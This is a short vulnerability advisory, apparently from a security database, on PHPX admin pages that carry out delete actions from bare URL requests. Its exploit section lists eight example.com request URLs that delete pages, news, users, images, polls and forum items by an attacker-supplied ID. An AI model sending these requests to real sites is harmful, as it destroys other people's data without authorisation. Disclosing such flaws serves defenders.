• info
• discussion
• exploit
• solution
• references

PHPX Multiple Administrator Command Execution Vulnerability

No exploit is required to carry out these issues. The following URI requests are reported to take actions against the affected application, [VID] is an arbitrary attacker-supplied unique identifier:

http://www.example.com/admin/page.php?action=delete&page_id=[VID]
http://www.example.com/admin/news.php?action=delete&news_id=[VID]
http://www.example.com/admin/user.php?action=delete&user_id=[VID]
http://www.example.com/admin/images.php?action=delete&image_id=[VID]
http://www.example.com/admin/page.php?action=deletePoll&poll_id=[VID]
http://www.example.com/admin/forums.php?action=words&subaction=delete&word_id=[VID]
http://www.example.com/admin/forums.php?action=flag&subaction=delete&flag_id=[VID]
http://www.example.com/admin/forums.php?action=xcode&subaction=delete&xcode_id=[VID]